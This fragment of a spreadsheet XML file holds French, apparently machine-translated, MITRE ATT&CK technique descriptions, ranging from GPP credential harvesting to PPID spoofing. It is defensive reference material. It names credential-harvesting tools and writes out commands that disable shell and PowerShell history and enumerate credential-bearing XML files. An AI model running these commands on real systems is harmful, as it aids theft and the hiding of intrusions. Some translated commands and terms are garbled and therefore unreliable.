    <t>Les adversaires peuvent tenter de trouver des informations d’identification non sécurisées dans les préférences de stratégie de groupe (GPP). Les GPP sont des outils qui permettent aux administrateurs de créer des politiques de domaine avec des informations d’identification intégrées. Ces règles permettent aux administrateurs de définir des comptes locaux. (Référence : Microsoft GPP 2016)
Ces stratégies de groupe sont stockées dans SYSVOL sur un contrôleur de domaine. Cela signifie que tout utilisateur du domaine peut afficher le partage SYSVOL et déchiffrer le mot de passe (à l’aide de la clé AES qui a été rendue publique). (Citation : Clé Microsoft GPP)
Les outils et scripts suivants peuvent être utilisés pour collecter et déchiffrer le fichier de mot de passe à partir des fichiers XML de préférence de stratégie de groupe :
* Module de post-exploitation de Metasploit : &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;
* Get-GPPPassword(Citation : obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
Sur le partage SYSVOL, les adversaires peuvent utiliser la commande suivante pour énumérer les fichiers XML GPP potentiels : &lt;code&gt;dir /s * .xml&lt;/code&gt;
https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler des données en les exfiltrant via un protocole réseau crypté de manière asymétrique autre que celui du canal de commande et de contrôle existant. Les données peuvent également être envoyées à un autre emplacement réseau à partir du serveur de commande et de contrôle principal. 
Les algorithmes de chiffrement asymétriques sont ceux qui utilisent des clés différentes à chaque extrémité du canal. Également connue sous le nom de cryptographie à clé publique, elle nécessite des paires de clés cryptographiques capables de chiffrer/déchiffrer les données de la clé correspondante. Chaque extrémité des canaux de communication nécessite une clé privée (uniquement dans le cortège de cette entité) et la clé publique de l’autre entité. Les clés publiques de chaque entité sont échangées avant le début des communications chiffrées. 
Les protocoles réseau qui utilisent le chiffrement asymétrique (tels que HTTPS/TLS/SSL) utilisent souvent le chiffrement symétrique une fois les clés échangées. Les adversaires peuvent choisir d’utiliser ces mécanismes cryptés qui sont intégrés dans un protocole.
https://attack.mitre.org/techniques/T1048/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste de comptes cloud. Les comptes cloud sont ceux créés et configurés par une organisation pour une utilisation par les utilisateurs, l’assistance à distance, les services ou l’administration des ressources au sein d’un fournisseur de services cloud ou d’une application SaaS.
Avec l’accès authentifié, il existe plusieurs outils qui peuvent être utilisés pour trouver des comptes. L’applet de commande PowerShell &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; peut être utilisée pour obtenir des noms de compte attribués à un rôle ou à un groupe d’autorisations dans Office 365. (Citation : Microsoft msolrolemember)(Citation : GitHub Raindance) Azure CLI (AZ CLI) fournit également une interface permettant d’obtenir des comptes d’utilisateur avec un accès authentifié à un domaine. La commande &lt;code&gt;az ad user list&lt;/code&gt; répertorie tous les utilisateurs d’un domaine. (Citation : Microsoft AZ CLI)(Citation : Black Hills Red Teaming MS AD Azure, 2018) 
La commande AWS &lt;code&gt;aws iam list-users&lt;/code&gt; peut être utilisée pour obtenir une liste d’utilisateurs dans le compte actuel, tandis &lt;code&gt;qu’aws iam list-roles&lt;/code&gt; peut obtenir des rôles IAM qui ont un préfixe de chemin d’accès spécifié. (Citation : Rôles de la liste AWS)(Citation : Utilisateurs de la liste AWS) Dans GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; et &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; peuvent être utilisés pour obtenir une liste des comptes de service et des utilisateurs d’un projet. (citation : Google Cloud - API de liste de comptes IAM Servie)
https://attack.mitre.org/techniques/T1087/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir des informations sur l’exécution de processus sur un système. Les informations obtenues pourraient être utilisées pour comprendre les logiciels et les applications courants qui s’exécutent sur les systèmes du réseau. L’administrateur ou un accès élevé peut fournir de meilleurs détails sur le processus. Les adversaires peuvent utiliser les informations de [Process Discovery](https://attack.mitre.org/techniques/T1057) lors de la découverte automatisée pour façonner des comportements ultérieurs, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
Dans les environnements Windows, les adversaires pouvaient obtenir des détails sur l’exécution des processus à l’aide de l’utilitaire [Tasklist](https://attack.mitre.org/software/S0057) via [cmd](https://attack.mitre.org/software/S0106) ou &lt;code&gt;Get-Process&lt;/code&gt; via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Des informations sur les processus peuvent également être extraites de la sortie des appels [Native API](https://attack.mitre.org/techniques/T1106) tels que &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt;. Sous Mac et Linux, cela se fait à l’aide de la commande &lt;code&gt;ps&lt;/code&gt;. Les adversaires peuvent également choisir d’énumérer les processus via « /proc ». 
Sur les périphériques réseau, les commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'show processes' peuvent être utilisées pour afficher les processus en cours d’exécution. (Référence : US-CERT-TA18-106A)(Référence : show_processes_cisco_cmd)
https://attack.mitre.org/techniques/T1057</t>
  </si>
  <si>
    <t>Les adversaires peuvent altérer l’enregistrement de l’historique des commandes pour masquer les commandes qu’ils exécutent sur un système compromis. Divers interpréteurs de commandes gardent une trace des commandes que les utilisateurs saisissent dans leur terminal afin que les utilisateurs puissent retracer ce qu’ils ont fait. 
Sous Linux et macOS, l’historique des commandes est suivi dans un fichier pointé par la variable &lt;code&gt;d’environnement HISTFILE.&lt;/code&gt; Lorsqu’un utilisateur se déconnecte d’un système, ces informations sont vidées dans un fichier appelé &lt;code&gt;~/.bash_history&lt;/code&gt; dans le répertoire personnel de l’utilisateur. La variable &lt;code&gt;d’environnement HISTCONTROL&lt;/code&gt; garde une trace de ce qui doit être sauvegardé par la commande &lt;code&gt;history&lt;/code&gt; et éventuellement dans le fichier &lt;code&gt;~/.bash_history&lt;/code&gt; lorsqu’un utilisateur se déconnecte. &lt;code&gt;HISTCONTROL&lt;/code&gt; n’existe pas par défaut sur macOS, mais peut être paramétré par l’utilisateur et sera respecté.
Les adversaires peuvent effacer la variable d’environnement historique (&lt;code&gt;désenclin HISTFILE)&lt;/code&gt; ou définir la taille de l’historique des commandes à zéro (&lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;) pour empêcher l’enregistrement des commandes. De plus, &lt;code&gt;HISTCONTROL&lt;/code&gt; peut être configuré pour ignorer les commandes qui commencent par un espace en le définissant simplement sur « ignorespace ». &lt;code&gt;HISTCONTROL&lt;/code&gt; peut également être configuré pour ignorer les commandes en double en le réglant sur « ignoredups ». Dans certains systèmes Linux, cette définition est définie par défaut sur « ignoreboth », ce qui couvre les deux exemples précédents. Cela signifie que « ls » ne sera pas enregistré, mais « ls » sera sauvé par l’histoire. Les adversaires peuvent en abuser pour opérer sans laisser de traces en ajoutant simplement un espace à toutes leurs commandes terminales. 
Sur les systèmes Windows, le module &lt;code&gt;PSReadLine&lt;/code&gt; suit les commandes utilisées dans toutes les sessions PowerShell et les écrit dans un fichier (&lt;code&gt;$env :APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; par défaut). Les adversaires peuvent modifier l’emplacement d’enregistrement de ces journaux à l’aide &lt;code&gt;de Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. Cela &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; empêchera de recevoir les journaux. En outre, il est possible de désactiver la journalisation de ce fichier à l’aide de la commande PowerShell &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt;. (Citation : Historique des commandes Microsoft PowerShell)(Citation : audit de commande Sophos PowerShell)(Citation : Sophos PowerShell Command History Forensics)
Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour désactiver la journalisation des commandes historiques (par exemple, &lt;code&gt;aucune journalisation&lt;/code&gt;).
https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer des bibliothèques de liens dynamiques (DLL) de fournisseur de réseau malveillantes pour capturer les informations d’identification de l’utilisateur en clair pendant le processus d’authentification. Les DLL des fournisseurs de réseau permettent à Windows de s’interfacer avec des protocoles réseau spécifiques et peuvent également prendre en charge des fonctions complémentaires de gestion des informations d’identification. (Citation : API du fournisseur de réseau) Pendant le processus de connexion, Winlogon (le module de connexion interactif) envoie des informations d’identification au processus local mpnotify.exe via RPC. Le processus mpnotify.exe partage ensuite les informations d’identification en clair avec les gestionnaires d’informations d’identification enregistrés lorsqu’il notifie qu’un événement d’ouverture de session se produit. (Citation : NPPSPY - Chasseresse)(Citation : Vidéo NPPSPY)(Citation : NPLogonNotify) 
Les adversaires peuvent configurer une DLL de fournisseur de réseau malveillante pour recevoir les informations d’identification de « mpnotify.exe ». (Citation : NPPSPY) Une fois installée en tant que gestionnaire d’informations d’identification (via le registre), une DLL malveillante peut recevoir et enregistrer des informations d’identification chaque fois qu’un utilisateur se connecte à un poste de travail ou à un domaine Windows via la fonction 'NPLogonNotify()'. (Citation : NPLogonNotify)
Les adversaires peuvent cibler l’implantation de DLL de fournisseurs de réseau malveillants sur des systèmes connus pour avoir une activité de connexion accrue et/ou une activité de connexion de l’administrateur, tels que des serveurs et des contrôleurs de domaine. (Citation : NPPSPY - Chasseresse)
https://attack.mitre.org/techniques/T1556/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et élever des privilèges en exécutant du contenu malveillant déclenché par un abonnement à un événement WMI (Windows Management Instrumentation). WMI peut être utilisé pour installer des filtres d’événements, des fournisseurs, des consommateurs et des liaisons qui exécutent du code lorsqu’un événement défini se produit. Des exemples d’événements auxquels il est possible d’être abonné sont l’heure de l’horloge murale, la connexion de l’utilisateur ou le temps de fonctionnement de l’ordinateur. (Citation : Mandiant M-Trends 2015)
Les adversaires peuvent utiliser les capacités de WMI pour s’abonner à un événement et exécuter du code arbitraire lorsque cet événement se produit, assurant ainsi la persistance sur un système. (Référence : FireEye WMI SANS 2015)(Référence : FireEye WMI 2015) Les adversaires peuvent également compiler des scripts WMI (à l’aide de « mofcomp.exe » dans des fichiers d’objets de gestion Windows (MOF) (extension .mof) qui peuvent être utilisés pour créer un abonnement malveillant. (Référence : Persistance de Dell WMI)(Citation : Microsoft MOF mai 2018)
L’exécution de l’abonnement WMI est assurée par le processus d’hôte du fournisseur WMI (WmiPrvSe.exe) et peut donc entraîner des privilèges SYSTEM élevés.
https://attack.mitre.org/techniques/T1546/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des données de réseau de diffusion de contenu (CDN) sur les victimes qui peuvent être utilisées lors du ciblage. Les CDN permettent à une organisation d’héberger du contenu à partir d’un ensemble de serveurs distribués et à charge équilibrée. Les CDN peuvent également permettre aux organisations de personnaliser la diffusion de contenu en fonction de la région géographique du demandeur.
Les adversaires peuvent rechercher des données CDN pour recueillir des informations exploitables. Les acteurs de la menace peuvent utiliser des ressources en ligne et des outils de recherche pour recueillir des informations sur les serveurs de contenu au sein d’un CDN. Les adversaires peuvent également rechercher et cibler les erreurs de configuration du CDN qui divulguent des informations sensibles non destinées à être hébergées et/ou qui ne disposent pas des mêmes mécanismes de protection (par exemple, les portails de connexion) que le contenu hébergé sur le site Web de l’organisation. (Citation : CDN DigitalShadows) Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), l’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou un accès initial (ex : [Passage intempestif Compromis](https://attack.mitre.org/techniques/T1189)).
https://attack.mitre.org/techniques/T1596/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser diverses vérifications de l’activité des utilisateurs pour détecter et éviter les environnements de virtualisation et d’analyse. Il peut s’agir de modifier les comportements en fonction des résultats des vérifications de la présence d’artefacts indiquant un environnement de machine virtuelle (VME) ou un bac à sable. Si l’adversaire détecte un VME, il peut modifier son logiciel malveillant pour se désengager de la victime ou dissimuler les fonctions essentielles de l’implant. Ils peuvent également rechercher des artefacts VME avant de supprimer des charges utiles secondaires ou supplémentaires. Les adversaires peuvent utiliser les informations apprises grâce à la [virtualisation/évasion du bac à sable](https://attack.mitre.org/techniques/T1497) lors de la découverte automatisée pour façonner des comportements ultérieurs. (Citation : Sensibilisation à l’environnement de Deloitte)
Les adversaires peuvent rechercher l’activité de l’utilisateur sur l’hôte en fonction de variables telles que la vitesse/fréquence des mouvements de souris et des clics (Citation : Sans Virtual Jan 2016), l’historique du navigateur, le cache, les signets ou le nombre de fichiers dans des répertoires communs tels que la maison ou le bureau. D’autres méthodes peuvent s’appuyer sur une interaction spécifique de l’utilisateur avec le système avant que le code malveillant ne soit activé, comme attendre la fermeture d’un document avant d’activer une macro (Citation : Unit 42 Sofacy Nov 2018) ou attendre qu’un utilisateur double-clique sur une image intégrée pour l’activer. (Référence : FireEye FIN7 avril 2017)
https://attack.mitre.org/techniques/T1497/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter des applications SaaS (Software-as-a-Service) compromises pour effectuer des tâches gourmandes en ressources, ce qui peut avoir un impact sur la disponibilité des services hébergés. 
Par exemple, les adversaires peuvent exploiter les services de messagerie et de messagerie, tels que AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid et Twilio, afin d’envoyer de grandes quantités d’e-mails et de SMS de spam/[hameçonnage](https://attack.mitre.org/techniques/T1566). (Citation : Invictus IR DangerDev 2024)(Citation : Permiso SES Abuse 2023)(Citation : SentinelLabs SNS Sender 2024) Alternativement, ils peuvent s’engager dans le LLMJacking en exploitant des proxys inverses pour détourner la puissance des modèles d’IA hébergés dans le cloud. (Citation : Sysdig LLMJacking 2024)(Citation : Lacework LLMJacking 2024)
Dans certains cas, les adversaires peuvent tirer parti des services que la victime utilise déjà. Dans d’autres, en particulier lorsque le service fait partie d’une plate-forme cloud plus vaste, ils peuvent d’abord activer le service. (Citation : Sysdig LLMJacking 2024) L’exploitation d’applications SaaS peut entraîner des coûts financiers importants, l’utilisation de quotas de services et un impact sur la disponibilité.
https://attack.mitre.org/techniques/T1496/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des comptes auprès de fournisseurs de cloud qui peuvent être utilisés lors du ciblage. Les adversaires peuvent utiliser des comptes cloud pour poursuivre leurs opérations, notamment en exploitant des services de stockage cloud tels que Dropbox, MEGA, Microsoft OneDrive ou des compartiments AWS S3 pour [Exfiltration vers le stockage cloud](https://attack.mitre.org/techniques/T1567/002) ou vers [Outil de chargement](https://attack.mitre.org/techniques/T1608/002). Les comptes cloud peuvent également être utilisés dans l’acquisition d’infrastructures, telles que l’infrastructure [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003) ou l’infrastructure [Serverless](https://attack.mitre.org/techniques/T1583/007). L’établissement de comptes cloud peut permettre aux adversaires de développer des fonctionnalités sophistiquées sans gérer leurs propres serveurs. (Citation : Awake Security C2 Cloud)
La création de [comptes cloud](https://attack.mitre.org/techniques/T1585/003) peut également nécessiter que des adversaires créent des [comptes de messagerie](https://attack.mitre.org/techniques/T1585/002) pour s’enregistrer auprès du fournisseur de cloud.
https://attack.mitre.org/techniques/T1585/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder aux suites logicielles centralisées installées au sein d’une entreprise et les utiliser pour exécuter des commandes et se déplacer latéralement sur le réseau. Les applications de gestion de la configuration et de déploiement de logiciels peuvent être utilisées dans un réseau d’entreprise ou un environnement cloud à des fins d’administration courante. Ces systèmes peuvent également être intégrés dans des pipelines CI/CD. Des exemples de ces solutions incluent : SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc et GCP Deployment Manager.  
L’accès à un logiciel de gestion des terminaux à l’échelle du réseau ou de l’entreprise peut permettre à un adversaire d’exécuter du code à distance sur tous les systèmes connectés. L’accès peut être utilisé pour se déplacer latéralement vers d’autres systèmes, collecter des informations ou provoquer un effet spécifique, tel que l’effacement des disques durs sur tous les terminaux.
Les services de gestion de configuration basés sur SaaS peuvent permettre une large [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) sur des instances hébergées dans le cloud, ainsi que l’exécution de commandes arbitraires sur des points de terminaison locaux. Par exemple, Microsoft Configuration Manager permet aux administrateurs globaux ou Intune d’exécuter des scripts en tant que SYSTEM sur des appareils locaux joints à Entra ID. (Citation : Déplacement latéral de SpecterOps d’Azure vers AD sur site 2020) Ces services peuvent également utiliser [Web Protocols](https://attack.mitre.org/techniques/T1071/001) pour communiquer avec l’infrastructure appartenant à l’adversaire. (Citation : Avis de sécurité Mitiga : l’agent SSM en tant que cheval de Troie d’accès à distance)
Les périphériques d’infrastructure réseau peuvent également disposer d’outils de gestion de la configuration qui peuvent être utilisés de la même manière par des adversaires. (Citation : Fortinet zero-day et un logiciel malveillant personnalisé utilisé par un acteur chinois présumé dans une opération d’espionnage)
Les autorisations requises pour cette action varient en fonction de la configuration du système ; Les informations d’identification locales peuvent être suffisantes pour un accès direct au système tiers, ou des informations d’identification de domaine spécifiques peuvent être requises. Cependant, le système peut nécessiter un compte administratif pour se connecter ou pour accéder à des fonctionnalités spécifiques.
https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler des données en les exfiltrant via un canal de commande et de contrôle existant. Les données volées sont codées dans le canal de communication normal en utilisant le même protocole que les communications de commande et de contrôle.
https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>Les adversaires peuvent usurper l’identificateur de processus parent (PPID) d’un nouveau processus pour contourner les défenses de surveillance des processus ou pour élever les privilèges. Les nouveaux processus sont généralement générés directement à partir de leur processus parent, ou appel, sauf indication explicite. L’une des façons d’attribuer explicitement le PPID d’un nouveau processus consiste à utiliser l’appel d’API &lt;code&gt;CreateProcess&lt;/code&gt;, qui prend en charge un paramètre définissant le PPID à utiliser. (Citation : DidierStevens SelectMyParent novembre 2009) Cette fonctionnalité est utilisée par les fonctionnalités Windows telles que le contrôle de compte d’utilisateur (UAC) pour définir correctement le PPID après qu’un processus élevé demandé est généré par SYSTEM (généralement via &lt;code&gt;svchost.exe&lt;/code&gt; ou &lt;code&gt;consent.exe&lt;/code&gt;) plutôt que le contexte utilisateur actuel. (Citation : Microsoft UAC novembre 2018)
Les adversaires peuvent abuser de ces mécanismes pour échapper aux défenses, telles que le blocage des processus générés directement à partir de documents Office et l’analyse ciblant des relations de processus parent-enfant inhabituelles/potentiellement malveillantes, telles que l’usurpation du PPID de [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) pour être &lt;code&gt;explorer.exe&lt;/code&gt; plutôt qu’un document Office livré dans le cadre de [Pièce jointe pour spearphishing](https://attack.mitre.org/techniques/T1566/001). (Citation : CounterCept PPID Spoofing décembre 2018) Cette usurpation d’identité peut être exécutée via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) dans un document Office malveillant ou tout code capable d’exécuter [API native](https://attack.mitre.org/techniques/T1106). (Citation : CTD PPID Spoofing Macro mars 2019)(Citation : CounterCept PPID Spoofing décembre 2018)
L’attribution explicite du PPID peut également activer des privilèges élevés avec des droits d’accès appropriés au processus parent. Par exemple, un adversaire dans un contexte d’utilisateur privilégié (c’est-à-dire un administrateur) peut générer un nouveau processus et affecter le parent en tant que processus s’exécutant en tant que SYSTEM (par exemple, &lt;code&gt;lsass.exe&lt;/code&gt;), ce qui entraîne une élévation de niveau élevé du nouveau processus via le jeton d’accès hérité. (Citation : XPNSec PPID novembre 2017)
https://attack.mitre.org/techniques/T1134/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur l’organisation de la victime qui peuvent être utilisées lors du ciblage. Les renseignements sur une organisation peuvent comprendre divers détails, notamment les noms des divisions ou des services, les détails des activités commerciales, ainsi que les rôles et responsabilités des employés clés.
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Les renseignements sur une organisation peuvent également être exposés à des adversaires par le biais d’outils en ligne ou d’autres ensembles de données accessibles (p. ex., [médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite ThreatPost Broadvoice)(Référence : SEC EDGAR Search) La collecte de ces informations peut révéler des opportunités pour d’autres formes de reconnaissance (ex : [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598) ou [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), l’établissement de ressources opérationnelles (ex : [Établir des comptes](https://attack.mitre.org/techniques/T1585) ou [Compromettre des comptes](https://attack.mitre.org/techniques/T1586)), et/ou un accès initial (ex : [Phishing]( https://attack.mitre.org/techniques/T1566) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1591</t>
  </si>
  <si>
    <t>Les adversaires peuvent falsifier des documents d’identification qui peuvent être utilisés pour accéder à des applications Web ou à des services Internet. Les applications et services Web (hébergés dans des environnements SaaS cloud ou des serveurs sur site) utilisent souvent des cookies de session, des jetons ou d’autres éléments pour authentifier et autoriser l’accès des utilisateurs.
Les adversaires peuvent générer ces informations d’identification afin d’accéder aux ressources Web. Cela diffère de [Voler le cookie de session Web](https://attack.mitre.org/techniques/T1539), [Voler le jeton d’accès à l’application](https://attack.mitre.org/techniques/T1528) et d’autres comportements similaires en ce sens que les informations d’identification sont nouvelles et falsifiées par l’adversaire, plutôt que volées ou interceptées auprès d’utilisateurs légitimes.
La génération d’informations d’identification Web nécessite souvent des valeurs secrètes, telles que des mots de passe, des [clés privées](https://attack.mitre.org/techniques/T1552/004) ou d’autres valeurs de départ cryptographiques. (Citation : GitHub AWS-ADFS-Credential-Generator) Les adversaires peuvent également falsifier des jetons en tirant parti de fonctionnalités telles que les API « AssumeRole » et « GetFederationToken » dans AWS, qui permettent aux utilisateurs de demander des informations d’identification de sécurité temporaires (c’est-à-dire, [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)), ou la commande « zmprov gdpak » dans Zimbra, qui génère une clé de pré-authentification qui peut être utilisée pour générer des jetons pour n’importe quel utilisateur du domaine. (Référence : Informations d’identification de sécurité temporaires AWS)(Citation : Zimbra Preauth)
Une fois falsifiés, les adversaires peuvent utiliser ces identifiants Web pour accéder à des ressources (ex : [Utiliser un autre matériel d’authentification](https://attack.mitre.org/techniques/T1550)), qui peuvent contourner les mécanismes de protection contre l’authentification multifactorielle et autres. (Citation : Passez le cookie)(Citation : Unit 42 Mac Crypto Cookies Janvier 2019)(Citation : Guide client de Microsoft SolarWinds)
https://attack.mitre.org/techniques/T1606</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de contourner les mécanismes d’authentification multifacteur (MFA) et d’accéder aux comptes en générant des demandes MFA envoyées aux utilisateurs.
Les adversaires en possession d’informations d’identification pour [Comptes valides](https://attack.mitre.org/techniques/T1078) peuvent ne pas être en mesure de terminer le processus de connexion s’ils n’ont pas accès aux mécanismes 2FA ou MFA requis en tant qu’informations d’identification supplémentaires et contrôle de sécurité. Pour contourner ce problème, les adversaires peuvent abuser de la génération automatique de notifications push vers des services MFA tels que Duo Push, Microsoft Authenticator, Okta ou des services similaires pour que l’utilisateur accorde l’accès à son compte. Si les adversaires ne disposent pas des informations d’identification des comptes victimes, ils peuvent également abuser de la génération automatique de notifications push lorsque cette option est configurée pour la réinitialisation de mot de passe en libre-service (SSPR). (Citation : Abus d’obsidienne SSPR 2023)
Dans certains cas, les adversaires peuvent répéter continuellement les tentatives de connexion afin de bombarder les utilisateurs de notifications push MFA, de SMS et d’appels téléphoniques, ce qui peut amener l’utilisateur à accepter la demande d’authentification en réponse à la « fatigue MFA ». (Citation : Contrariété russe 2FA Push - Cimpanu)(Citation : Attaques de fatigue MFA - PortSwigger)(Citation : Activité russe présumée ciblant des entités gouvernementales et commerciales dans le monde entier)
https://attack.mitre.org/techniques/T1621</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les fichiers binaires des logiciels hôtes pour établir un accès permanent aux systèmes. Les fichiers binaires/exécutables logiciels fournissent un large éventail de commandes ou de services système, de programmes et de bibliothèques. Les binaires logiciels courants sont les clients SSH, les clients FTP, les clients de messagerie, les navigateurs Web et de nombreuses autres applications utilisateur ou serveur.
Les adversaires peuvent établir une persistance en modifiant les fichiers binaires du logiciel hôte. Par exemple, un adversaire peut remplacer ou infecter un fichier binaire d’application légitime (ou des fichiers de support) par une porte dérobée. Étant donné que ces fichiers binaires peuvent être exécutés régulièrement par les applications ou l’utilisateur, l’adversaire peut en tirer parti pour obtenir un accès persistant à l’hôte. Un adversaire peut également modifier un binaire logiciel tel qu’un client SSH afin de collecter de manière persistante des informations d’identification lors des connexions (c’est-à-dire, [Modifier le processus d’authentification](https://attack.mitre.org/techniques/T1556)). (Référence : Google Cloud Mandiant UNC3886 2024)
Un adversaire peut également modifier un binaire existant en y ajoutant des correctifs de fonctionnalités malveillantes (par exemple, IAT Hooking/Entry point patching) (Citation : Unit42 Banking Trojans Hooking 2022) avant l’exécution légitime du binaire. Par exemple, un adversaire peut modifier le point d’entrée d’un fichier binaire pour pointer vers un code malveillant corrigé par l’adversaire avant de reprendre le flux d’exécution normal. (Citation : ESET FontOnLake Analysis 2021)
Après avoir modifié un binaire, un adversaire peut tenter de [Nuire aux défenses](https://attack.mitre.org/techniques/T1562) en l’empêchant de se mettre à jour (par exemple, via la commande 'yum-versionlock' ou le fichier 'versionlock.list' dans les systèmes Linux qui utilisent le gestionnaire de paquets yum). (Référence : Google Cloud Mandiant UNC3886 2024)
https://attack.mitre.org/techniques/T1554</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter directement des informations d’identification non sécurisées stockées ou transmises par le biais des services de communication avec les utilisateurs. Les informations d’identification peuvent être envoyées et stockées dans des applications de communication par chat utilisateur telles que les e-mails, des services de chat tels que Slack ou Teams, des outils de collaboration tels que Jira ou Trello, et tout autre service prenant en charge la communication avec les utilisateurs. Les utilisateurs peuvent partager diverses formes d’informations d’identification (telles que des noms d’utilisateur et des mots de passe, des clés API ou des jetons d’authentification) sur des canaux de communication internes d’entreprise privés ou publics.
Plutôt que d’accéder aux journaux de chat stockés (c’est-à-dire [Informations d’identification dans les fichiers](https://attack.mitre.org/techniques/T1552/001)), les adversaires peuvent accéder directement aux informations d’identification de ces services sur le point de terminaison de l’utilisateur, via des serveurs hébergeant les services ou via des portails d’administrateur pour les services hébergés dans le cloud. Les adversaires peuvent également compromettre les outils d’intégration tels que les flux de travail Slack pour rechercher automatiquement dans les messages afin d’extraire les informations d’identification de l’utilisateur. Ces informations d’identification peuvent ensuite être utilisées de manière abusive pour effectuer des activités de suivi telles que le mouvement latéral ou l’élévation de privilèges (Citation : Slack Security Risks).
https://attack.mitre.org/techniques/T1552/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des commandes et des scripts PowerShell pour l’exécution. PowerShell est une interface de ligne de commande interactive puissante et un environnement de script inclus dans le système d’exploitation Windows. (Citation : TechNet PowerShell) Les adversaires peuvent utiliser PowerShell pour effectuer un certain nombre d’actions, notamment la découverte d’informations et l’exécution de code. Il s’agit par exemple de l’applet &lt;code&gt;de commande Start-Process&lt;/code&gt;, qui peut être utilisée pour exécuter un exécutable, et de l’applet &lt;code&gt;de commande Invoke-Command&lt;/code&gt;, qui exécute une commande localement ou sur un ordinateur distant (bien que des autorisations d’administrateur soient requises pour utiliser PowerShell pour se connecter à des systèmes distants).
PowerShell peut également être utilisé pour télécharger et exécuter des exécutables à partir d’Internet, qui peuvent être exécutés à partir du disque ou en mémoire sans toucher le disque.
Un certain nombre d’outils de test offensif basés sur PowerShell sont disponibles, notamment [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378) et PSAttack. (Citation : Github PSAttack)
Les commandes/scripts PowerShell peuvent également être exécutés sans appeler directement le binaire &lt;code&gt;powershell.exe&lt;/code&gt; via les interfaces de la DLL d’assembly &lt;code&gt;System.Management.Automation&lt;/code&gt; sous-jacente de PowerShell exposée via le cadre .NET et l’interface de ligne de commande Windows Common Language Interface. (Citation : Sixdub PowerPick janvier 2016)(Citation : SilentBreak Offensive PS décembre 2015)(Citation : Microsoft PSfromCsharp APR 2014)
https://attack.mitre.org/techniques/T1059/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir la persistance en exécutant du contenu malveillant déclenché par une association de type de fichier. Lorsqu’un fichier est ouvert, le programme par défaut utilisé pour ouvrir le fichier (également appelé association de fichiers ou gestionnaire) est vérifié. Les sélections d’association de fichiers sont stockées dans le registre Windows et peuvent être modifiées par les utilisateurs, les administrateurs ou les programmes qui ont accès au registre ou par les administrateurs à l’aide de l’utilitaire associé intégré. (Citation : Microsoft Change Default Programs)(Citation : Gestionnaires de fichiers Microsoft)(Citation : Microsoft Assoc octobre 2017) Les applications peuvent modifier l’association de fichiers pour une extension de fichier donnée afin d’appeler un programme arbitraire lorsqu’un fichier avec l’extension donnée est ouvert.
Les associations de fichiers système sont répertoriées sous &lt;code&gt;HKEY_CLASSES_ROOT\.[ extension]&lt;/code&gt;, par exemple &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. Les entrées pointent vers un gestionnaire pour cette extension situé dans &lt;code&gt;HKEY_CLASSES_ROOT\\[handler].&lt;/code&gt; Les différentes commandes sont ensuite listées en tant que sous-clés sous la clé shell au &lt;code&gt;niveau de HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command.&lt;/code&gt; Par exemple: 
